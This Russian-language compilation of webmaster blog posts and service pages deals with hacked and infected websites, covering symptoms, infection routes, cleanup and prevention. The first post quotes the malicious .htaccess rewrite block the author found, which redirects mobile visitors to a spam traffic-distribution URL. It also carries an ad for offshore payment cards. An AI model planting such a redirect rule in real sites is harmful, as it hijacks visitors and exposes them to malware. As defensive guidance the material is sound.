Заражённые сайты — новый бич Рунета. Зараженные сайты


Что делать если сайт заражен?

Вчера у меня произошло не очень приятное происшествие - заразили все мои сайты. Хорошо, что я был за компьютером и сразу заметил проблему. Что произошло?

Один мой сайт стало вдруг перебрасывать на какой то сайт знакомств, неприличный сайт, мягко говоря. При переходе на мой домен тут же шёл редирект на этот спамерский сайт.

Это очень плохая ситуация, так как если сразу не решить проблему, то вы можете распугать посетителей. А если это продлится долго, то поисковые системы могут наложить на ваш сайт фильтр и вы потеряете все позиции в поиске.

Что делать если сайт заражен?

 

Я уже писал как то о том, как найти вирус на сайте, но в данном случае требовалось найти вирус быстро. Я тут же стал искать вредоносный код вручную.

Что делать если сайт зараженТак как переадресация шла со всех страниц, то я подумал, что какой скрипт мне внедрили в шапку (header.php) или подвал (footer.php). Но там постороннего кода не было.

Я тут же связался со службой поддержки хостинга:

 - У меня сайт такой то, стал переадресовываться на какой то неприличный ресурс, помогите решить проблему.

Но не успели они мне ответить, как я сам догадался куда ещё нужно посмотреть. В файле .htaccess, который находится в корне сайта, я обнаружил вот такой код:

RewriteEngine On RewriteBase / RewriteCond %{HTTP_USER_AGENT} android|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|pad)|iris|kindle|lge |maemo|meego.+mobile|midp|mmp|netfront|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-) [NC] RewriteRule ^$ _http://luxurytds.com/go.php?sid=1 [R,L] # BULLETPROOF .50.8 >>>>>>> SECURE .HTACCESS

Как только я его удалил, все стало работать как нужно. На все у меня ушло 5 мин. Но если бы на моем месте был полный новичок, то у него на это могла бы уйти куча времени, если бы он вообще смог найти проблему сам.

К своему ужасу я обнаружил, что подобным образом заразили все мои сайты. Я тут же устранил проблему и написал в поддержку хостинга:

 У меня все сайты заразили, значит заразили и все на вашем хостинге, не плохо было бы предупредить народ.

На что последовал ответ:

 "Заразили" только файлы Ваших сайтов. Следовательно, в каком-то (каких-то) из Ваших сайтов имеются уязвимости, которую(ые) использовали для изменения файлов на аккаунте. Вам нужно обратиться к веб-разработчику для поиска и устранения этих уязвимостей.

Может и так, не проверить. Это уже не первый случай, когда мои сайты на этом хостинге пытаются заразить. Неужели у всех вебмастеров такие проблемы? Или это только на моём хостинге?

Это мой не первый хостинг и нигде у меня не было таких проблем. Все больше склоняюсь к том, чтобы сменить хостинг, к примеру на ЭТОТ.

Не успел я решить эту проблему, как техподдержка написала мне, что другой мой сайт рассылает спам. Как оказалось, мне в папку с одним плагином залили посторонний php файл, и через него как то слали спам.

Я удалил этот файл, и проблема решилась. У меня уже чётко складывается впечатление, что WordPress - это тот же Windows, и что с этим делать?

СОВЕТ ВЕБМАСТЕРУ: Умение зарабатывать в интернете - это только пол дела, вторая половина - это умение ВЫГОДНО обналичивать электронные деньги. Вот список офшорных банковских карт, на которые можно выводить средства и потом снимать с них хрустящие купюры:

1. Epayments - можно открыть счет в долларах, евро и рублях. Формально банка нет, юридический адрес в Лондоне, но можно получить реквизиты банка в Латвии.

2. AdvCash - Офшорный банк находится в Белизе, можно открыть счет в долларах, евро, фунтах и рублях.

3. Payeer - Штаб квартира этой платежной системы находится в Грузии, тут так же можно открыть счет в долларах, евро и рублях.

4. Capitalist - Можно создать счета в долларах, евро и рублях. Низкие тарифы на вывод. Компания зарегистрирована в юрисдикции Британских Виргинских Островов.

Во всех случаях можно заказать банковскую карту, которую пришлют вам по обычной почте. Активируете ее и идете снимать деньги банкомат! Тарифы смотрите на сайтах платежных систем.

zmoe.ru

Заражённые сайты — новый бич Рунета — Дмитрий Волотко

Стоит отметить, сразу, что это бич не только Рунета, но и всей Сети. Но за последние пару месяцев я наблюдаю просто дикий рост количества подобных сайтов именно в Рунете.

За последние пару месяцев ко мне обратилось более десятка людей, у которых появились проблемы такого рода на их сайтах. Всем помог, все довольны, но у людей это сожрало деньги, время, нервы и позиции в поисковых системах.

Что такое «вирусы на сайте»? Как правило, это банальный фрейм, который либо накручивает показы какой-нибудь порно-странички,или, что чаще, пытается подгрузить через дыры в браузерах копию трояна для вашей операционной системы.

В основном, это вирусы семейства Downloader.JS.*.

Трояны же могут выполнять самые разнообразные функции, от воровства различных электронных кошельков и средств на них, до воровства паролей к ftp и ssh от хостингов, для заражения новых сайтов.

Пароли, как бы они хорошо не шифровались, можно вытащить практически из любой программы, к примеру из Far Commander или Mozilla Firefox вытащить их проще некуда. И список таких программ достаточно обширен, по факту — все популярные браузеры и ftp-клиенты.

Вытащенные пароли от ftp троян отправляет на сервер-матку, которая их определённым образом обрабатывает, и ставит в очередь на заражение. Звучит немного бредово, но на самом деле это до смешного просто реализовать. Единственная сложность, которую я вижу прямо сейчас — это обеспечить большую скорость работы вредоносного скрипта.

Эти самые скрипты, логинясь на фтп, проходятся по всем каталогам рекурсивно, внедряя свой код в определённые файлы. Как правило их можно назвать двумя масками: index.* и *.js. Обычно эти скрипты внедряют код разными способами, к примеру обычный фрейм, или вызов удалённого JS, который рисует тот-же самый фрейм. Способов достаточно много.

(кликабельно)

Часто зловредный код маскируется под популярные сервисы, к примеру под Аналитику от Google или счётчик от LiveInternet.

Если с прямой угрозой заражения компьютера мы, как грамотные пользователи, справится можем, то с угрозой самим сайтам справится сложнее.

Во-первых, с момента заражения ваш сайт, а то и сайты — это разносчик заразы, и если ваша аудитория девушки-школьницы — то есть большой шанс того, что заражённых машин будет довольно много.

Во-вторых, все современные браузеры блокирует заражённые сайты, основываясь на статистике от специализированных поисковых роботов Google. Выг

absolvo.ru

Заражение сайта через инфицированный плагин браузера

За последние несколько месяцев к нам все чаще обращаются клиенты с сайтами, у которых был посторонний javascript код в базе данных.

Выглядит этот инжект всегда одинаково: к “свежим” записям в таблице страниц или постов приклеивается достаточно “жирный” фрагмент обфусцированного javascript с iframe, который для посетителя сайта подгружает порцию рекламы, обычно в виде всплывающих баннеров с предложением познакомиться, поиграть в казино и т.п. Внедренный код был на сайтах, которые работают на различных CMS: wordpress, joomla, форумные движки, DLE и пр. Это классический Adware.

Ни анализ запросов в логах на подозрение в эксплуатации SQL инъекций, ни сканирования файлов на аккаунте хостинга на предмет взлома и наличия хакерских скриптов не давали положительного результата. Сайты всегда были чистые. По журналу веб-сервера также не было видно атак или несанкционированных операций, с помощью которых можно было бы внедрить вредоносный код.

Мы поискали упоминания данного кода в поисковике и обнаружили больше сотни тысяч сайтов, на которых он был проиндексирован.

В результате сбора и анализа информации по зараженным клиентским сайтам, было выявлено, что причиной данного кода является зараженный  браузер у владельца сайта или его администратора. Администратор ничего не подозревая размещал новые посты, при этом к POST запросам формы приклеивался «вредонос».  Например, запрос сохранения публикации в Joomla с зараженного компьютера выглядел так:

Как можно заметить, это очень эффективный способ распространения “малвари”. Печально то, что фактически сам владелец сайта или его контент-менеджер заражает сайт. При этом многие находили этот код в базе (число вставок там обычно больше сотни), вычищали его и через некоторое время база снова заполнялась обфусцированным javascript.

Проблема решается с помощью лечения компьютера коммерческим антивирусом, удаления зараженного плагина или переустановкой браузера. У одного клиента в браузере Chrome было установлено легитимное расширение, в котором был "вредонос":

После удаления расширения код перестал добавляться в базу. Другой клиент вылечил свой Firefox антивирусом Касперского, и также после этого код базе больше не появлялся:

Если у вас подобное заражение и вам потребуется помощь в удалении заражения в базе, обращайтесь к нашим специалистам.

 

Обсуждаем и комментируем

revisium.com

Сайт заражен вирусом, что делать?

Сайт заражен вирусом, что делать?

Будет верхом банальности сказать “прежде всего не надо паниковать!”. В случае, если ваш сайт заражен вирусом или содержит вредоносный код, паниковать может и не нужно, но двигать пятой точкой стоит очень активно, потому что чем быстрее вы уберете с сайта эту дрянь, тем проще и быстрее будет устранить последствия всей этой ситуации.

Руководство не является исчерпывающим. Каждая ситуация индивидуальна. Да и решение проблемы выбрано далеко не всем удобное, но общий вектор мысли в данной ситуации вы определить вполне сможете

Как я обнаружил вирус на своем сайте?

22 октября я обнаружил критическую просадку посещаемости на одном из моих сайтов. Трафик был небольшой, но стабильный + сайт приносил стандартно от 5 до 10 заказов в месяц для целиком оффлайнового бизнеса. Количество ежедневных уникальных посетителей было от 10 до 30. Конверсия низкая, но сам сайт старый, в плане конверсии непроработанный, а создавался он под региональную компанию, которая занималась изготовлением памятников на могилы. В рамках региона получить более серьезную отдачу от сайта можно было, но в этом не было никакой необходимости, да и заниматься им было откровенно неохота. Денег и усилий он не требовал абсолютно и стабильно висел в топе яндекса и google примерно по 50 тематическим запросам.

Сайт заражен вирусом, что делать?

Беда подкралась незаметно. В один прекрасный день я обратил внимание, что счётчик посещаемости два дня стоит на нуле, а на третий день он просто отвалился. Я переустановил счётчик, в надежде, что его исчезновение связано с обновлением cms WordPress, на котором работал сайт, но результата это не дало, он опять отвалился. Закрались сомнения. Зашёл на сайт, меня перекинуло на али экспресс. Охренел. Именно так я понял, что с сайтом что-то не так.

Как определить, что на вашем сайте вирус?

  • С сайта идёт редирект на другой сайт (спасибо, кэп!)
  • Просадка по посещаемости из органической выдачи
  • Выпадение позиций сайта за границы топа выдачи
  • Появление непонятных всплывающих окон, ссылок, редиректов и навигационных элементов.
  • Нарушение работоспособности счетчика яндекс метрики
  • Сообщения об ошибках в инструментах веб-мастера яндекс и google
  • Данные антивирусов для сайтов и средств диагностики сайта вашего хостинга

К слову, онлайн антивирусы и кабинеты вебмастеров в нашей ситуации молчали. В отличие от антивируса в админке хостинга Бегет (есть мой отзыв о хостинге Бегет – я им вообще очень доволен), который порекомендовали сотрудники хостинга после моего обращения. Вредоносный код был найден и обозначен, но лечение сайта я решил провести наиболее радикально, совместив его с проработкой вопроса конверсии сайта.

Сайт заражен вирусом, что делать?

Что делать с вирусом на сайте?

Озадачить программиста вопросом исключения вредоносного кода из сайта. Это наверное и стоило бы делать, если ваш сайт работает давно, хорошо и содержит великое множество информации. Есть даже специальные компании, которые занимаются удалением вирусов и вредоносного кода с сайта. В нашем же случае, когда сайт был заражён вирусом, я решил снести все файлы и базу данных, предварительно скопировав весь текстовый материал. Заодно и дизайн переделаю, и конверсию немного проработаю – подумал я.

Откуда вообще мог возникнуть вредоносный код или вирус на сайте?

Сайт заражен вирусом, что делать?

Это доступ к вашему ftp или админке cms. В моем случае код закамуфлировался под тему WordPress, которая попала в структуру сайта 29 сентября. То есть с момента попадания кода на сайт до принятия санкции поисковиков прошло почти 3 недели.

Поэтому держите ваши пароли и логины в надежном месте, используйте достаточно сложные данные для входа в админ панель сайта, ftp и личный кабинет хостинга, оградите себя от использования пиратского софта, взломанных тем и плагинов для сайтов, сомнительных надстроек и кода, который требует включения в структуру, обновляйте cms (при ее наличии) и выбирайте надёжный и толковый хостинг.

Сайт вылечен, как выйти из под фильтра поисковых систем после удаления вредоносного кода или вируса?

Самое очевидное – написать из интерфейса инструментов веб-мастера сообщения о том, что проблема решена и попросить вернуть сайт в выдачу. Что интересно, в яндекс мы написали, он частично вернул позиции к 5 дню, google же сделал все это автоматом.

Сайт заражен вирусом, что делать?

Константин Фримен и проект Заработай или сдохни

konstantin-freeman.ru

Защита Вашего сайта от вирусов и угроз

Михаил имел свой сайт, который был достаточно популярен в своей нише. Он продавал ссылки со своего сайта, тем самым, зарабатывал на его поддержание. Со временем, популярность сайта Михаила возросла, он обзавелся прямыми рекламодателями и открыл небольшой интернет-магазин. Дела шли в гору, Михаил уволился с основной работы и полностью посвятил себя сайту. Все было хорошо до определенного момента...

Вдруг, Михаил обнаружил, что посещаемость его сайта резко упала. Сократилось количество заказов. Еще через некоторое время его сайт выпал из результатов поиска в Яндексе и Google. Рекламодатели отказались от сотрудничества, количество заказов в интернет магазине опустилось до нуля, продажные ссылки были сняты. От прежнего дохода не осталось и следа. Кроме того, все постоянные посетители сайта Михаила больше не заходили на его ресурс.

Михаил впал в депрессию – он лишился своего основного заработка, ради которого уволился с работы. Вся работа в течение нескольких лет была фактически уничтожена.

На последние средства он нанял специалиста, который нашел причину всех неудач – в скрипты его сайта внедрился вирус, о чем Михаил не знал. Со временем сайт попал в базы антивирусных программ – это привело к тому, что большинство пользователей просто не могло попасть на сайт, т.к. антивирусы блокировали доступ. Ну а потом Яндекс и Google исключили сайт из поиска, так же из-за вируса.

Если бы Михаил узнал о вирусе сразу, он бы просто удалил его и ничего этого не произошло бы.

Т.е. если бы Михаил моментально узнал о том, что на его сайте появился вирус, он удалил бы его за пару минут и его сайту больше ничего бы не угрожало.

Кстати, Михаил так и не смог восстановить репутацию своего сайта, даже удалив вирус. Он потратил на это уйму средств, времени и нервов. Но все оказалось напрасно. Ему пришлось закрыть свой сайт и снова устроиться на работу с зарплатой в несколько раз ниже тех денег, которые он получал со своего сайта.

На месте Михаила может оказаться каждый! Когда это произойдет - как скоро вы об этом узнаете?

monitorus.pro

Лечим зараженный сайт | AllForJoomla apps

В первую очередь необходимо тщательно проанализировать все возможные и невозможные способы заражения. Это позволит вам выявить причину, а значит – выбрать максимально эффективный способ ее устранения.

Сайт может быть заражен одним из следующих способов:

  • злоумышленник получил пароли доступа к SSH, FTP или CMS;
  • уязвимость веб-приложений позволяет размещать вредоносный код на сайте;
  • зараженная баннерная система, партнерка или счетчик посещаемости код может стать опасным для пользователей.

В сервисе Яндекс.Вебмастер содержится вся информация о зараженных страницах сайта, включая даты проверок и вынесенный поисковой системой «диагноз». Анализ этой информации позволит вам определить вредоносный код, который появляется на страницах сайта.

Если сайт все же заражен – первым делом следует остановить сервер, чтобы оградить посетителей ресурса от потенциальной угрозы. Следующий шаг – тщательная проверка антивирусной программой с актуальной базой сигнатур угроз всех файлов веб-сервера и всех рабочих станций, с которых осуществляется администрирование сервера.

После проверки нужно заменить все пароли. Если есть возможность – можно попробовать восстановить сайт из резервной копии, которая была сделана до появления вредоносного кода. Чтобы свести риск заражения к минимуму – нужно вовремя обновлять все программное обеспечение, которое использует сайт.

Не помешает удалить всех пользователей, которые обладают расширенными полномочиями и проверить сервер на наличие веб-шелла.

После того как все эти работы проведены, нужно проверить наличие кода в следующих местах:

Если ваш сайт размещен на shared-хостинге – незамедлительно проверьте остальные сайты, они также могут быть заражены.

При поиске кода нужно обратить внимание на следующие факторы:

  • посторонний код, который априори не соответствует системе контроля версий;
  • нечитаемый код;
  • дата последней модификации файлов.

После того как код обнаружен и удален – пометка поисковой системы о потенциальной опасности сайта будет снята. Но это произойдет лишь после того, как Яндекс проведет повторную проверку и не обнаружит признаков опасности. Чтобы ускорить проверку и поскорее вернуть сайт в строй, можно отправить специальный запрос.

Первые несколько недель рекомендуется регулярно проверять код сайта на случай, если уязвимость не была полностью устранена или злоумышленники все еще имеют коды доступа к ресурсу.

Предотвратить заражение значительно проще, чем устранять его последствия. Поэтому не стоит пренебрегать превентивными мерами. Регулярный контроль кода, периодическая смена паролей и использование актуального антивирусного программного обеспечения сделают ваш сайт труднодоступным для злоумышленников.

allforjoomla.ru